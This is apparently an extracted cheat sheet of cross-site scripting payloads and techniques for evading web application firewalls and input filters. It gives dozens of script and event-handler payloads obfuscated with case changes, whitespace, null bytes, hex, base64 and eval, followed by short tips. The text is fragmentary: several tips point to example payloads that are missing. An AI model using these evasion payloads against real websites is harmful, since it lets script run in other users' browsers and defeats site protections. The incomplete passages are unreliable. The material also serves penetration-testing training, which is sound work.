Basic Modification
This is our normal payload but now if WAF is blocking
<script>,alert,</script> tags, then you can try this.
<script >alert(1)</script>
<script>window['al'+'ert']()</script>
<script>top[`alert`]()</script>
<script	>alert(1)</script>
<script
>alert(1)</script>
<script
>alert(1)</script>
<ScRipT>alert(1)</sCriPt>
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
<img src=x onerror="js:abc='al'+'ert(1)';eval(abc)" />
<script>window[['a','l','e','r','t'].toString().replaceAll(',',"")]()</script>
<script>window[['conf','irm'].toString().replaceAll(',',"")]()</script>
<script>abc='\x61\x6C\x65\x72\x74';this[abc]()</script>
<script>window['\x61\x6C\x65\x72\x74']()</script>
<script>window[['\x61\x6C\x65\x72\x74'].toString().replaceAll(",","")]()</script>
<script>abc='aLerT()';eval(abc.toLowerCase())</script>
<script>abc='YWxlcnQoKQ==';eval(atob(abc))</script>
<script>abc='CoNFirM()';eval(abc.toLowerCase())</script>
Try giving random whitespaces to bypass WAF.
Try giving random HTML encoded values between Script tags.
Attributes and Tags
You can try this payload to fool the website, because as it
has <> (closing tag) and the website gets terminated as it
feels like the value is empty.
Try writing XSS test code:
Try writing any random tag at starting:
Try replacing the space or writing any HTML values between tags
Try inserting null byte (%00) at different positions
Null Byte can work on Attribute name and values too..
Event Handlers
A Button which a user is going to click on a page. By
working on some JavaScript we can create a button (an event).
Try these alternatives instead on onsubmit (if it doesn’t work)
These alternatives can also be used if it the HTML used here is HTML5.
Delimiters & Brackets
Delimiter is one or more character used to separate text
Try using Single & Double quotes
Try using encoded values to Bypass
<img onerror=`alert(1)`src=x> Try using backtick or accent
Can use encoded values in between
Try using ` (grave accent)
Same as Delimiters, Brackets can also help to bypass website or page filters.
By using extra brackets the system can be tricked, and by using double slash it comments out the extra bracket on closing tag.
Open Bracket at the end could also help to bypass
Try using different brackets
Try using different Characters
Psuedo Protocols
It’s a hyperlink where a user goes from one page to another with just one click
Try Injecting a code using Javascript to check XSS
Other attributes also can be used that takes URL as a value..
Existing Javascript & Character Escaping
Try defining a Variable & injecting a payload ‘; alert(1); //
Script will function but the system wont filter because of double slash.
<script>var a = ‘\\’; alert(1); // Escaping character can also be helpful
Using Unicode Characters like this can help
Dynamic String Construction & Eval()
This function evaluate to 2. JavaScript contains a function called eval()
We can use Unicode encoding
if the function is blocked then some actual characters can work. There is another function that can be used in lieu of eval() called fromCharCode().
Meta Refresh & File Renaming
Web browser can automatically refresh the current page after a certain period.
<script src=”payload.jpg”> Try renaming the
source to an image file.
Sanitization & Length Limits
Try adding multiple tags. (sometimes application removes first instance of script tag)
Can add any tag for first instance to get filtered by application. If a page is being returned because of the
Length Limit then:
/* and */ get ignored, so the browser ultimately processes our payload as if it was injected in only one location.